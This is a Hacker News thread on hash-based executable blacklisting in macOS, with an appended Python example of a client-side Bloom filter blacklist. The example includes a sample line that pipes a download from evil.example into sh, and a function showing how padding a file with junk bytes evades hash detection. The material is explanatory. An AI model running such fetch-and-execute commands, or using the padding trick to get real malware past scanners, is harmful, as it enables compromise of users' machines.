
361 points | robenkleene | 3 comments
londons_explore | No.23282990
This must be a blacklist, since it doesn't block my own random scripts which it has never seen before.

If it's a global blacklist on apple servers, it should instead be downloaded to the client, and be a local blacklist.

Too big? Use a bloom filter. Now you only end up keeping less than one byte per blacklisted item. Update the bloom filter with an autoupdater. Any positive hit you can check against the server just in case it's a false positive.

replies (3): >>23283287, >>23283550, >>23283950

1. caf | No.23283950
Doesn't a blacklist also work only until the malware authors figure out how to randomize 8 junk bytes every time they serve an executable?
replies (2): >>23285266, >>23285447

2. therein | No.23285266
Which they already do.
3. dimator | No.23285447
That's the crazy thing about this. There are already obfuscation techniques against hash blacklists, so what is this even for? There's no earthly way Apple security engineers didn't know that. So what is actually happening?

My guess is that it's strictly for banning app store apps that they pull from the app store, but would like also to cripple retroactively on installed machines. But that doesn't explain why it had to run against random shell scripts? This is all still confusing. We don't have all the info.
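An added example, not code from this thread or from Apple, that puts both points above into runnable form: the client-side Bloom filter blacklist that londons_explore describes (local filter, server consulted only on a hit) and the junk-byte evasion that caf and therein point out. It assumes SHA-256 as the content hash, simulates the server's exact blacklist with an in-memory set, and uses constructed byte strings as stand-ins for executables; none of these are real samples, and the hash construction inside the filter is a generic double-hashing scheme, not whatever Apple actually does.

```python
import hashlib
import math

# Constructed stand-ins for executables (assumption: not real samples).
BLACKLISTED_FILES = [
    b"#!/bin/sh\ncurl -s http://evil.example/payload | sh\n",
    b"\x7fELF\x02\x01\x01" + b"fake-malware-two",
    b"MZ" + b"fake-malware-three",
]
BENIGN_FILES = [
    b"#!/bin/sh\necho hello world\n",
    b"#!/usr/bin/env python3\nprint('hi')\n",
]


def file_hash(data: bytes) -> bytes:
    """Content hash the client looks up (SHA-256 here; an assumption)."""
    return hashlib.sha256(data).digest()


def bloom_params(n: int, p: float):
    """Bits m and hash count k for n items at target false-positive rate p."""
    m = math.ceil(-n * math.log(p) / (math.log(2) ** 2))
    k = max(1, round(m / n * math.log(2)))
    return m, k


class BloomFilter:
    """Minimal bit-array Bloom filter using double hashing (h1 + i*h2 mod m)."""

    def __init__(self, m: int, k: int):
        self.m, self.k = m, k
        self.bits = bytearray((m + 7) // 8)

    def _positions(self, item: bytes):
        d = hashlib.sha256(b"bloom:" + item).digest()
        h1 = int.from_bytes(d[:8], "big")
        h2 = int.from_bytes(d[8:16], "big") | 1  # odd, so i*h2 never collapses to 0
        return [(h1 + i * h2) % self.m for i in range(self.k)]

    def add(self, item: bytes) -> None:
        for pos in self._positions(item):
            self.bits[pos >> 3] |= 1 << (pos & 7)

    def might_contain(self, item: bytes) -> bool:
        # False means definitely absent; True means "possibly present, verify".
        return all(self.bits[pos >> 3] & (1 << (pos & 7)) for pos in self._positions(item))


def build_blacklist(files, p=0.01):
    """Server side: the exact hash set, plus the Bloom filter shipped to clients."""
    hashes = {file_hash(f) for f in files}
    m, k = bloom_params(len(hashes), p)
    bloom = BloomFilter(m, k)
    for h in hashes:
        bloom.add(h)
    return hashes, bloom


def check_executable(data: bytes, bloom: BloomFilter, server_hashes: set):
    """Client side. Returns (verdict, asked_server).

    Only a Bloom hit triggers the server lookup (simulated by a set here), so
    the server never learns about files the local filter rules out.
    """
    h = file_hash(data)
    if not bloom.might_contain(h):
        return "allow", False
    return ("block" if h in server_hashes else "allow"), True


def pad_with_junk(data: bytes, junk: bytes) -> bytes:
    """The trivial evasion: append junk so the content hash no longer matches."""
    return data + junk


if __name__ == "__main__":
    server_hashes, bloom = build_blacklist(BLACKLISTED_FILES)
    for f in BLACKLISTED_FILES + BENIGN_FILES:
        print(f[:24], check_executable(f, bloom, server_hashes))
    variant = pad_with_junk(BLACKLISTED_FILES[0], bytes(8))
    print("padded variant:", check_executable(variant, bloom, server_hashes))
    for p in (0.1, 0.01):
        m, k = bloom_params(1_000_000, p)
        print(f"p={p}: {m / 1_000_000:.2f} bits per item, k={k}")
```

Two things the numbers show. The "less than one byte per item" figure holds only at a loose false-positive rate: at 10% it is about 4.8 bits per entry, at 1% it is about 9.6 bits, and every false positive costs a server round trip. And the padded variant sails through: its SHA-256 is different, so neither the filter nor the exact server set knows it, which is exactly why a content-hash blacklist only catches samples that have not yet been re-served with fresh junk.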